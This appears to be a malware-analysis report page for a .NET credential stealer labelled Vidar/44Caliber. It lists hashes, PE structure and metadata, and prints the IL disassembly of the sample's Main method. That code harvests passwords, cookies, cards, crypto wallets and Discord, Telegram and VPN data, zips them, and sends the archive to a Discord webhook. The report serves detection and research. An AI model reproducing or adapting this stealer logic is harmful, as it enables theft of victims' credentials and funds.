Malicious
Malicious

912e6cdd368f8ce183e90f9501780909

PE Executable
|
MD5: 912e6cdd368f8ce183e90f9501780909
|
Size: 280.58 KB
|
application/x-msdownload

Executable
PE (Portable Executable)
Win 32 Exe
x86
PDB Path
Stealer
Vidar Stealer
.Net
SOS: 0.03
Print
General
Structural Analysis
Config.0
Yara Rules16
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Very low

Hash
 Hash Value
MD5
912e6cdd368f8ce183e90f9501780909
Sha1
1edfe954322f06422f85601558f27ebad1ef2d0a
Sha256
584c3b11bd420c8503bcc77802025a4682ad57aed622c835ca5dfa903b68a9fa
Sha384
d200ba6823cea0c47b48ccf78682a5e4d62c0fd9283b248017689ae6816e8d23f47309b066654783bf68e47c4de43c59
Sha512
e5a0f67bb61b95fde8810cdf833787ee25eb0b62094c776ba6cdcd5c1d5df5dae8a1402e55a6892bb9b14db20d033f2cd53178bf5589464211320f8db3120b2b
SSDeep
6144:Ff+BLtABPDPtN4C5+e3z8lJ89hDZQT1hLRI1D03OH:dt2e3z8lyhDGm1DXH
TLSH
BA545B4027ED8B55E2FF4BB9E0B0026183B1B462FD7EDB8E5D4424EE1923740DA55BA3

PeID

HQR data file
File Structure
912e6cdd368f8ce183e90f9501780909
Executable
PE (Portable Executable)
Win 32 Exe
x86
PDB Path
Stealer
Vidar Stealer
.Net
SOS: 0.03
Malicious
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Informations
Name
 Value
Module Name

Insidious.exe
Full Name

Insidious.exe
EntryPoint

System.Void youknowcaliber.Program::Main(System.String[])
Scope Name

Insidious.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Insidious
Assembly Version

1.6.2.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.0
Total Strings

1275
Main Method

System.Void youknowcaliber.Program::Main(System.String[])
Main IL Instruction Count

433
Main IL

ldsfld System.String youknowcaliber.Help::ExploitDir call System.Boolean System.IO.File::Exists(System.String) brtrue IL_04C6: ret call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.String System.Diagnostics.Process::get_ProcessName() call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldlen <null> conv.i4 <null> ldc.i4.1 <null> bne.un IL_04C6: ret ldsfld System.String youknowcaliber.Help::ExploitDir call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> newobj System.Void System.Collections.Generic.List`1<System.Threading.Thread>::.ctor() stloc.0 <null> ldloc.0 <null> ldsfld System.Threading.ThreadStart youknowcaliber.Program/<>c::<>9__0_0 dup <null> brtrue.s IL_0057: newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) pop <null> ldsfld youknowcaliber.Program/<>c youknowcaliber.Program/<>c::<>9 ldftn System.Void youknowcaliber.Program/<>c::<Main>b__0_0() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Threading.ThreadStart youknowcaliber.Program/<>c::<>9__0_0 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Collections.Generic.List`1<System.Threading.Thread>::Add(System.Threading.Thread) ldloc.0 <null> ldsfld System.Threading.ThreadStart youknowcaliber.Program/<>c::<>9__0_1 dup <null> brtrue.s IL_0081: newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) pop <null> ldsfld youknowcaliber.Program/<>c youknowcaliber.Program/<>c::<>9 ldftn System.Void youknowcaliber.Program/<>c::<Main>b__0_1() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Threading.ThreadStart youknowcaliber.Program/<>c::<>9__0_1 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Collections.Generic.List`1<System.Threading.Thread>::Add(System.Threading.Thread) ldloc.0 <null> ldsfld System.Threading.ThreadStart youknowcaliber.Program/<>c::<>9__0_2 dup <null> brtrue.s IL_00AB: newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) pop <null> ldsfld youknowcaliber.Program/<>c youknowcaliber.Program/<>c::<>9 ldftn System.Void youknowcaliber.Program/<>c::<Main>b__0_2() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Threading.ThreadStart youknowcaliber.Program/<>c::<>9__0_2 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Collections.Generic.List`1<System.Threading.Thread>::Add(System.Threading.Thread) ldloc.0 <null> ldsfld System.Threading.ThreadStart youknowcaliber.Program/<>c::<>9__0_3 dup <null> brtrue.s IL_00D5: newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) pop <null> ldsfld youknowcaliber.Program/<>c youknowcaliber.Program/<>c::<>9 ldftn System.Void youknowcaliber.Program/<>c::<Main>b__0_3() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Threading.ThreadStart youknowcaliber.Program/<>c::<>9__0_3 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Collections.Generic.List`1<System.Threading.Thread>::Add(System.Threading.Thread) ldloc.0 <null> ldsfld System.Threading.ThreadStart youknowcaliber.Program/<>c::<>9__0_4 dup <null> brtrue.s IL_00FF: newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) pop <null> ldsfld youknowcaliber.Program/<>c youknowcaliber.Program/<>c::<>9 ldftn System.Void youknowcaliber.Program/<>c::<Main>b__0_4() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Threading.ThreadStart youknowcaliber.Program/<>c::<>9__0_4 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Collections.Generic.List`1<System.Threading.Thread>::Add(System.Threading.Thread) ldloc.0 <null> ldsfld System.Threading.ThreadStart youknowcaliber.Program/<>c::<>9__0_5 dup <null> brtrue.s IL_0129: newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) pop <null> ldsfld youknowcaliber.Program/<>c youknowcaliber.Program/<>c::<>9 ldftn System.Void youknowcaliber.Program/<>c::<Main>b__0_5() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Threading.ThreadStart youknowcaliber.Program/<>c::<>9__0_5 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Collections.Generic.List`1<System.Threading.Thread>::Add(System.Threading.Thread) ldloc.0 <null> callvirt System.Collections.Generic.List`1/Enumerator<System.Threading.Thread> System.Collections.Generic.List`1<System.Threading.Thread>::GetEnumerator() stloc.s V_7 br.s IL_0149: ldloca.s V_7 ldloca.s V_7 call System.Threading.Thread System.Collections.Generic.List`1/Enumerator<System.Threading.Thread>::get_Current() callvirt System.Void System.Threading.Thread::Start() ldloca.s V_7 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.Threading.Thread>::MoveNext() brtrue.s IL_013D: ldloca.s V_7 leave.s IL_0162: ldloc.0 ldloca.s V_7 constrained. System.Collections.Generic.List`1/Enumerator<System.Threading.Thread> callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.0 <null> callvirt System.Collections.Generic.List`1/Enumerator<System.Threading.Thread> System.Collections.Generic.List`1<System.Threading.Thread>::GetEnumerator() stloc.s V_7 br.s IL_0178: ldloca.s V_7 ldloca.s V_7 call System.Threading.Thread System.Collections.Generic.List`1/Enumerator<System.Threading.Thread>::get_Current() callvirt System.Void System.Threading.Thread::Join() ldloca.s V_7 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.Threading.Thread>::MoveNext() brtrue.s IL_016C: ldloca.s V_7 leave.s IL_0191: ldc.i4.7 ldloca.s V_7 constrained. System.Collections.Generic.List`1/Enumerator<System.Threading.Thread> callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldc.i4.7 <null> newarr System.String dup <null> ldc.i4.0 <null> ldsfld System.String youknowcaliber.Help::ExploitDir stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr \ stelem.ref <null> dup <null> ldc.i4.2 <null> call System.String youknowcaliber.SystemInfo::CountryCode() stelem.ref <null> dup <null> ldc.i4.3 <null> call System.String youknowcaliber.SystemInfo::IP() stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr ( stelem.ref <null> dup <null> ldc.i4.5 <null> ldsfld System.String youknowcaliber.Help::dateLog stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr ).zip stelem.ref <null> call System.String System.String::Concat(System.String[]) stloc.1 <null> ldstr cp866 call System.Text.Encoding System.Text.Encoding::GetEncoding(System.String) newobj System.Void Ionic.Zip.ZipFile::.ctor(System.Text.Encoding) stloc.s V_8 ldloc.s V_8 ldc.i4.m1 <null> conv.i8 <null> callvirt System.Void Ionic.Zip.ZipFile::set_ParallelDeflateThreshold(System.Int64) ldloc.s V_8 ldc.i4.2 <null> callvirt System.Void Ionic.Zip.ZipFile::set_UseZip64WhenSaving(Ionic.Zip.Zip64Option) ldloc.s V_8 ldc.i4.6 <null> callvirt System.Void Ionic.Zip.ZipFile::set_CompressionLevel(Ionic.Zlib.CompressionLevel) ldloc.s V_8 ldstr ================================================ ===============44 CALIBER STEALER=============== ================================================ Maded by ChaosInsurgency | lolz.guru/thanatophobia telegram @chaosinsurgency Written exclusively for educational purposes! I am not responsible for the use of this project and any of its parts code. callvirt System.Void Ionic.Zip.ZipFile::set_Comment(System.String) ldloc.s V_8 ldsfld System.String youknowcaliber.Config::zipPass callvirt System.Void Ionic.Zip.ZipFile::set_Password(System.String) ldloc.s V_8 ldsfld System.String youknowcaliber.Help::ExploitDir callvirt Ionic.Zip.ZipEntry Ionic.Zip.ZipFile::AddDirectory(System.String) pop <null> ldloc.s V_8 ldloc.1 <null> callvirt System.Void Ionic.Zip.ZipFile::Save(System.String) leave.s IL_023A: ldc.i4.s 32 ldloc.s V_8 brfalse.s IL_0239: endfinally ldloc.s V_8 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldc.i4.s 32 newarr System.String dup <null> ldc.i4.0 <null> ldstr :spy: NEW LOG FROM - stelem.ref <null> dup <null> ldc.i4.1 <null> call System.String System.Environment::get_MachineName() stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr stelem.ref <null> dup <null> ldc.i4.3 <null> call System.String System.Environment::get_UserName() stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr :person_in_manual_wheelchair: :eye: IP: stelem.ref <null> dup <null> ldc.i4.5 <null> call System.String youknowcaliber.SystemInfo::IP() stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr stelem.ref <null> dup <null> ldc.i4.7 <null> call System.String youknowcaliber.SystemInfo::Country() stelem.ref <null> dup <null> ldc.i4.8 <null> ldstr :desktop: stelem.ref <null> dup <null> ldc.i4.s 9 call System.String youknowcaliber.SystemInfo::GetSystemVersion() stelem.ref <null> dup <null> ldc.i4.s 10 ldstr ================================ :key: Passwords - stelem.ref <null> dup <null> ldc.i4.s 11 ldsflda System.Int32 youknowcaliber.Counting::Passwords call System.String System.Int32::ToString() stelem.ref <null> dup <null> ldc.i4.s 12 ldstr :cookie: Cookies - stelem.ref <null> dup <null> ldc.i4.s 13 ldsflda System.Int32 youknowcaliber.Counting::Cookies call System.String System.Int32::ToString() stelem.ref <null> dup <null> ldc.i4.s 14 ldstr :notepad_spiral: AutoFills - stelem.ref <null> dup <null> ldc.i4.s 15 ldsflda System.Int32 youknowcaliber.Counting::AutoFill call System.String System.Int32::ToString() stelem.ref <null> dup <null> ldc.i4.s 16 ldstr :credit_card: CC - stelem.ref <null> dup <null> ldc.i4.s 17 ldsflda System.Int32 youknowcaliber.Counting::CreditCards call System.String System.Int32::ToString() stelem.ref <null> dup <null> ldc.i4.s 18 ldstr :file_folder: Grabbed Files - stelem.ref <null> dup <null> ldc.i4.s 19 ldsflda System.Int32 youknowcaliber.Counting::FileGrabber call System.String System.Int32::ToString() stelem.ref <null> dup <null> ldc.i4.s 20 ldstr ================================ GRABBED SOFTWARE: stelem.ref <null> dup <null> ldc.i4.s 21 ldsfld System.Int32 youknowcaliber.Counting::Discord ldc.i4.0 <null> bgt.s IL_0320: ldstr "\n Discord" ldstr br.s IL_0325: stelem.ref ldstr Discord stelem.ref <null> dup <null> ldc.i4.s 22 ldsfld System.Int32 youknowcaliber.Counting::Wallets ldc.i4.0 <null> bgt.s IL_0338: ldstr "\n Wallets" ldstr br.s IL_033D: stelem.ref ldstr Wallets stelem.ref <null> dup <null> ldc.i4.s 23 ldsfld System.Int32 youknowcaliber.Counting::Telegram ldc.i4.0 <null> bgt.s IL_0350: ldstr "\n Telegram" ldstr br.s IL_0355: stelem.ref ldstr Telegram stelem.ref <null> dup <null> ldc.i4.s 24 ldsfld System.Int32 youknowcaliber.Counting::FileZilla ldc.i4.0 <null> bgt.s IL_0368: ldstr "\n FileZilla (" ldstr br.s IL_0381: stelem.ref ldstr FileZilla ( ldsflda System.Int32 youknowcaliber.Counting::FileZilla call System.String System.Int32::ToString() ldstr ) call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> ldc.i4.s 25 ldsfld System.Int32 youknowcaliber.Counting::Steam ldc.i4.0 <null> bgt.s IL_0394: ldstr "\n Steam" ldstr br.s IL_0399: stelem.ref ldstr Steam stelem.ref <null> dup <null> ldc.i4.s 26 ldsfld System.Int32 youknowcaliber.Counting::NordVPN ldc.i4.0 <null> bgt.s IL_03AC: ldstr "\n NordVPN" ldstr br.s IL_03B1: stelem.ref ldstr NordVPN stelem.ref <null> dup <null> ldc.i4.s 27 ldsfld System.Int32 youknowcaliber.Counting::OpenVPN ldc.i4.0 <null> bgt.s IL_03C4: ldstr "\n OpenVPN" ldstr br.s IL_03C9: stelem.ref ldstr OpenVPN stelem.ref <null> dup <null> ldc.i4.s 28 ldsfld System.Int32 youknowcaliber.Counting::ProtonVPN ldc.i4.0 <null> bgt.s IL_03DC: ldstr "\n ProtonVPN" ldstr br.s IL_03E1: stelem.ref ldstr ProtonVPN stelem.ref <null> dup <null> ldc.i4.s 29 ldsfld System.Int32 youknowcaliber.Counting::VimeWorld ldc.i4.0 <null> bgt.s IL_03F4: ldstr "\n VimeWorld" ldstr br.s IL_0447: stelem.ref ldstr VimeWorld ldsfld System.Boolean youknowcaliber.Config::VimeWorld brtrue.s IL_0407: ldc.i4.6 ldstr br.s IL_0442: call System.String System.String::Concat(System.String,System.String) ldc.i4.6 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr : NickName - stelem.ref <null> dup <null> ldc.i4.1 <null> call System.String youknowcaliber.Vime::NickName() stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr : Donate - stelem.ref <null> dup <null> ldc.i4.3 <null> call System.String youknowcaliber.Vime::Donate() stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr : Level - stelem.ref <null> dup <null> ldc.i4.5 <null> call System.String youknowcaliber.Vime::Level() stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.String System.String::Concat(System.String,System.String) stelem.ref <null> dup <null> ldc.i4.s 30 ldstr ================================ DOMAINS DETECTED: - stelem.ref <null> dup <null> ldc.i4.s 31 ldsfld System.String youknowcaliber.Help::ExploitDir ldstr \Browsers\ call System.String System.String::Concat(System.String,System.String) call System.String youknowcaliber.URLSearcher::GetDomainDetect(System.String) stelem.ref <null> call System.String System.String::Concat(System.String[]) stloc.2 <null> call System.String System.Environment::get_MachineName() ldstr . call System.String System.Environment::get_UserName() ldstr .zip call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.3 <null> ldstr zip stloc.s V_4 ldloc.1 <null> stloc.s V_5 ldstr stloc.s V_6 ldloc.2 <null> ldloc.3 <null> ldloc.s V_4 ldloc.s V_5 ldloc.s V_6 call System.String DiscordWebhook::SendFile(System.String,System.String,System.String,System.String,System.String) pop <null> leave.s IL_04B8: call System.Void youknowcaliber.Program::Finish() pop <null> ldstr Log size is more then 8 MB. Sending isn`t available. call System.String DiscordWebhook::Send(System.String) pop <null> leave.s IL_04B8: call System.Void youknowcaliber.Program::Finish() call System.Void youknowcaliber.Program::Finish() leave.s IL_04C6: ret call System.Void System.Console::WriteLine(System.Object) leave.s IL_04C6: ret ret <null>
Artefacts
Name
 Value
PDB Path

C:\Users\rated\Desktop\44CALIBER-main\44CALIBER\obj\Release\Insidious.pdb
Embedded Resources

0
Suspicious Type Names (1-2 chars)

0
912e6cdd368f8ce183e90f9501780909 (280.58 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙